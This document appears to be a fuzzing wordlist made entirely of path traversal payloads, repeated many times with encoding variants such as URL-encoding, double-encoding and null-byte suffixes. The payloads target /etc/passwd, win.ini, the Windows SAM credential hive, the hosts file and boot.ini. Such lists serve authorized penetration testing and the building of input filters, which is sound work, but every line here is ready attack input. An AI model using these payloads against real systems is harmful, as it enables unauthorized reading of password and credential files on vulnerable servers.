C:\Windows\win.ini
..//..//etc//passwd
../../../../../../../../../../../../../../../../../../../../etc/passwd%00
..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd
..\..\etc\passwd
%2e%2e%2f%2e%2e%2fetc/passwd
..\/..\/..\/..\/etc\/passwd
../../../../../../../../../../windows/win.ini%00
//..//..//..//..//..//..//..//..//windows//system32//config//sam
/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows/system32/config/sam
..\..\..\..\..\..\..\..\..\..\windows\win.ini
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd
..//..//..//..//etc//passwd
\/..\/..\/..\/..\/..\/..\/..\/..\/windows\/system32\/config\/sam
\..\..\..\..\..\..\..\..\etc\passwd
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd
/../../../../../../../../windows/system32/config/sam%00
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows/system32/config/sam
\..\..\..\..\..\..\..\..\windows\system32\config\sam
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd
../../etc/passwd
../../../../../../../../../../windows/win.ini
/../../../../../../../../windows/system32/config/sam
//..//..//..//..//..//..//..//..//etc//passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows/win.ini
../../../../etc/passwd%00
..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//etc//passwd
/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd
\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd
../../../../etc/passwd
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\etc\passwd
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows/win.ini
..//..//..//..//..//..//..//..//..//..//windows//win.ini
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd
/../../../../../../../../etc/passwd
C:\Windows\System32\config\SAM
..\..\..\..\etc\passwd
..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/windows\/win.ini
../../../../../../../../../../../../../../../../../../../../etc/passwd
../../etc/passwd%00
C:\Windows\System32\drivers\etc\hosts
%252e%252e%252f%252e%252e%252fetc/passwd
..\/..\/etc\/passwd
C:\boot.ini
/../../../../../../../../etc/passwd%00
C:\Windows\win.ini
..//..//etc//passwd
../../../../../../../../../../../../../../../../../../../../etc/passwd%00
..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd
..\..\etc\passwd
%2e%2e%2f%2e%2e%2fetc/passwd
..\/..\/..\/..\/etc\/passwd
../../../../../../../../../../windows/win.ini%00
//..//..//..//..//..//..//..//..//windows//system32//config//sam
/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows/system32/config/sam
..\..\..\..\..\..\..\..\..\..\windows\win.ini
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd
..//..//..//..//etc//passwd
\/..\/..\/..\/..\/..\/..\/..\/..\/windows\/system32\/config\/sam
\..\..\..\..\..\..\..\..\etc\passwd
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd
/../../../../../../../../windows/system32/config/sam%00
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows/system32/config/sam
\..\..\..\..\..\..\..\..\windows\system32\config\sam
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd
../../etc/passwd
../../../../../../../../../../windows/win.ini
/../../../../../../../../windows/system32/config/sam
//..//..//..//..//..//..//..//..//etc//passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows/win.ini
../../../../etc/passwd%00
..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//etc//passwd
/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd
\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd
../../../../etc/passwd
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\etc\passwd
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows/win.ini
..//..//..//..//..//..//..//..//..//..//windows//win.ini
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd
/../../../../../../../../etc/passwd
C:\Windows\System32\config\SAM
..\..\..\..\etc\passwd
..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/windows\/win.ini
../../../../../../../../../../../../../../../../../../../../etc/passwd
../../etc/passwd%00
C:\Windows\System32\drivers\etc\hosts
%252e%252e%252f%252e%252e%252fetc/passwd
..\/..\/etc\/passwd
C:\boot.ini
/../../../../../../../../etc/passwd%00
C:\Windows\win.ini
..//..//etc//passwd
../../../../../../../../../../../../../../../../../../../../etc/passwd%00
..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd
..\..\etc\passwd
%2e%2e%2f%2e%2e%2fetc/passwd
..\/..\/..\/..\/etc\/passwd
../../../../../../../../../../windows/win.ini%00
//..//..//..//..//..//..//..//..//windows//system32//config//sam
/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows/system32/config/sam
..\..\..\..\..\..\..\..\..\..\windows\win.ini
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd
..//..//..//..//etc//passwd
\/..\/..\/..\/..\/..\/..\/..\/..\/windows\/system32\/config\/sam
\..\..\..\..\..\..\..\..\etc\passwd
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd
/../../../../../../../../windows/system32/config/sam%00
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows/system32/config/sam
\..\..\..\..\..\..\..\..\windows\system32\config\sam
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd
../../etc/passwd
../../../../../../../../../../windows/win.ini
/../../../../../../../../windows/system32/config/sam
//..//..//..//..//..//..//..//..//etc//passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows/win.ini
../../../../etc/passwd%00
..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//etc//passwd
/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd
\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd
../../../../etc/passwd
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\etc\passwd
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows/win.ini
..//..//..//..//..//..//..//..//..//..//windows//win.ini
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd
/../../../../../../../../etc/passwd
C:\Windows\System32\config\SAM
..\..\..\..\etc\passwd
..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/windows\/win.ini
../../../../../../../../../../../../../../../../../../../../etc/passwd
../../etc/passwd%00
C:\Windows\System32\drivers\etc\hosts
%252e%252e%252f%252e%252e%252fetc/passwd
..\/..\/etc\/passwd
C:\boot.ini
/../../../../../../../../etc/passwd%00
C:\Windows\win.ini
..//..//etc//passwd
../../../../../../../../../../../../../../../../../../../../etc/passwd%00
..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd
..\..\etc\passwd
%2e%2e%2f%2e%2e%2fetc/passwd
..\/..\/..\/..\/etc\/passwd
../../../../../../../../../../windows/win.ini%00
//..//..//..//..//..//..//..//..//windows//system32//config//sam
/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows/system32/config/sam
..\..\..\..\..\..\..\..\..\..\windows\win.ini
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd
..//..//..//..//etc//passwd
\/..\/..\/..\/..\/..\/..\/..\/..\/windows\/system32\/config\/sam
\..\..\..\..\..\..\..\..\etc\passwd
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd
/../../../../../../../../windows/system32/config/sam%00
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows/system32/config/sam
\..\..\..\..\..\..\..\..\windows\system32\config\sam
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd
../../etc/passwd
../../../../../../../../../../windows/win.ini
/../../../../../../../../windows/system32/config/sam
//..//..//..//..//..//..//..//..//etc//passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows/win.ini
../../../../etc/passwd%00
..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//etc//passwd
/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd
\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd
../../../../etc/passwd
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\etc\passwd
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows/win.ini
..//..//..//..//..//..//..//..//..//..//windows//win.ini
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd
/../../../../../../../../etc/passwd
C:\Windows\System32\config\SAM
..\..\..\..\etc\passwd
..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/windows\/win.ini
../../../../../../../../../../../../../../../../../../../../etc/passwd
../../etc/passwd%00
C:\Windows\System32\drivers\etc\hosts
%252e%252e%252f%252e%252e%252fetc/passwd
..\/..\/etc\/passwd
C:\boot.ini
/../../../../../../../../etc/passwd%00
C:\Windows\win.ini
..//..//etc//passwd
../../../../../../../../../../../../../../../../../../../../etc/passwd%00
..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd
..\..\etc\passwd
%2e%2e%2f%2e%2e%2fetc/passwd
..\/..\/..\/..\/etc\/passwd
../../../../../../../../../../windows/win.ini%00
//..//..//..//..//..//..//..//..//windows//system32//config//sam
/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows/system32/config/sam
..\..\..\..\..\..\..\..\..\..\windows\win.ini
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd
..//..//..//..//etc//passwd
\/..\/..\/..\/..\/..\/..\/..\/..\/windows\/system32\/config\/sam
\..\..\..\..\..\..\..\..\etc\passwd
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd
/../../../../../../../../windows/system32/config/sam%00
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows/system32/config/sam
\..\..\..\..\..\..\..\..\windows\system32\config\sam
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd
../../etc/passwd
../../../../../../../../../../windows/win.ini
/../../../../../../../../windows/system32/config/sam
//..//..//..//..//..//..//..//..//etc//passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows/win.ini
../../../../etc/passwd%00
..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//etc//passwd
/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd
\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd
../../../../etc/passwd
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\etc\passwd
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows/win.ini
..//..//..//..//..//..//..//..//..//..//windows//win.ini
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd
/../../../../../../../../etc/passwd
C:\Windows\System32\config\SAM
..\..\..\..\etc\passwd
..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/windows\/win.ini
../../../../../../../../../../../../../../../../../../../../etc/passwd
../../etc/passwd%00
C:\Windows\System32\drivers\etc\hosts
%252e%252e%252f%252e%252e%252fetc/passwd
..\/..\/etc\/passwd
C:\boot.ini
/../../../../../../../../etc/passwd%00
C:\Windows\win.ini
..//..//etc//passwd
../../../../../../../../../../../../../../../../../../../../etc/passwd%00
..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd
..\..\etc\passwd
%2e%2e%2f%2e%2e%2fetc/passwd
..\/..\/..\/..\/etc\/passwd
../../../../../../../../../../windows/win.ini%00
//..//..//..//..//..//..//..//..//windows//system32//config//sam
/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows/system32/config/sam
..\..\..\..\..\..\..\..\..\..\windows\win.ini
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd
..//..//..//..//etc//passwd
\/..\/..\/..\/..\/..\/..\/..\/..\/windows\/system32\/config\/sam
\..\..\..\..\..\..\..\..\etc\passwd
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd
/../../../../../../../../windows/system32/config/sam%00
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows/system32/config/sam
\..\..\..\..\..\..\..\..\windows\system32\config\sam
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd
../../etc/passwd
../../../../../../../../../../windows/win.ini
/../../../../../../../../windows/system32/config/sam
//..//..//..//..//..//..//..//..//etc//passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows/win.ini
../../../../etc/passwd%00
..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//etc//passwd
/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd
\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd
../../../../etc/passwd
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\etc\passwd
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows/win.ini
..//..//..//..//..//..//..//..//..//..//windows//win.ini
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd
/../../../../../../../../etc/passwd
C:\Windows\System32\config\SAM
..\..\..\..\etc\passwd
..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/windows\/win.ini
../../../../../../../../../../../../../../../../../../../../etc/passwd
../../etc/passwd%00
C:\Windows\System32\drivers\etc\hosts
%252e%252e%252f%252e%252e%252fetc/passwd
..\/..\/etc\/passwd
C:\boot.ini
/../../../../../../../../etc/passwd%00
C:\Windows\win.ini
..//..//etc//passwd
../../../../../../../../../../../../../../../../../../../../etc/passwd%00
..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd
..\..\etc\passwd
%2e%2e%2f%2e%2e%2fetc/passwd
..\/..\/..\/..\/etc\/passwd
../../../../../../../../../../windows/win.ini%00
//..//..//..//..//..//..//..//..//windows//system32//config//sam
/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows/system32/config/sam
..\..\..\..\..\..\..\..\..\..\windows\win.ini
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd
..//..//..//..//etc//passwd
\/..\/..\/..\/..\/..\/..\/..\/..\/windows\/system32\/config\/sam
\..\..\..\..\..\..\..\..\etc\passwd
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd
/../../../../../../../../windows/system32/config/sam%00
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows/system32/config/sam
\..\..\..\..\..\..\..\..\windows\system32\config\sam
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd
../../etc/passwd
../../../../../../../../../../windows/win.ini
/../../../../../../../../windows/system32/config/sam
//..//..//..//..//..//..//..//..//etc//passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows/win.ini
../../../../etc/passwd%00
..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//etc//passwd
/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd
\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd
../../../../etc/passwd
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\etc\passwd
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows/win.ini
..//..//..//..//..//..//..//..//..//..//windows//win.ini
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd
/../../../../../../../../etc/passwd
C:\Windows\System32\config\SAM
..\..\..\..\etc\passwd
..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/windows\/win.ini
../../../../../../../../../../../../../../../../../../../../etc/passwd
../../etc/passwd%00
C:\Windows\System32\drivers\etc\hosts
%252e%252e%252f%252e%252e%252fetc/passwd
..\/..\/etc\/passwd
C:\boot.ini
/../../../../../../../../etc/passwd%00
C:\Windows\win.ini
..//..//etc//passwd
../../../../../../../../../../../../../../../../../../../../etc/passwd%00
..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd
..\..\etc\passwd
%2e%2e%2f%2e%2e%2fetc/passwd
..\/..\/..\/..\/etc\/passwd
../../../../../../../../../../windows/win.ini%00
//..//..//..//..//..//..//..//..//windows//system32//config//sam
/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows/system32/config/sam
..\..\..\..\..\..\..\..\..\..\windows\win.ini
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd
..//..//..//..//etc//passwd
\/..\/..\/..\/..\/..\/..\/..\/..\/windows\/system32\/config\/sam
\..\..\..\..\..\..\..\..\etc\passwd
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd
/../../../../../../../../windows/system32/config/sam%00
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows/system32/config/sam
\..\..\..\..\..\..\..\..\windows\system32\config\sam
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd
../../etc/passwd
../../../../../../../../../../windows/win.ini
/../../../../../../../../windows/system32/config/sam
//..//..//..//..//..//..//..//..//etc//passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows/win.ini
../../../../etc/passwd%00
..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//etc//passwd
/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd
\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd
../../../../etc/passwd
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\etc\passwd
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows/win.ini
..//..//..//..//..//..//..//..//..//..//windows//win.ini
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd
/../../../../../../../../etc/passwd
C:\Windows\System32\config\SAM
..\..\..\..\etc\passwd
..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/windows\/win.ini
../../../../../../../../../../../../../../../../../../../../etc/passwd
../../etc/passwd%00
C:\Windows\System32\drivers\etc\hosts
%252e%252e%252f%252e%252e%252fetc/passwd
..\/..\/etc\/passwd
C:\boot.ini
/../../../../../../../../etc/passwd%00
C:\Windows\win.ini
..//..//etc//passwd
../../../../../../../../../../../../../../../../../../../../etc/passwd%00
..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd
..\..\etc\passwd
%2e%2e%2f%2e%2e%2fetc/passwd
..\/..\/..\/..\/etc\/passwd
../../../../../../../../../../windows/win.ini%00
//..//..//..//..//..//..//..//..//windows//system32//config//sam
/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows/system32/config/sam
..\..\..\..\..\..\..\..\..\..\windows\win.ini
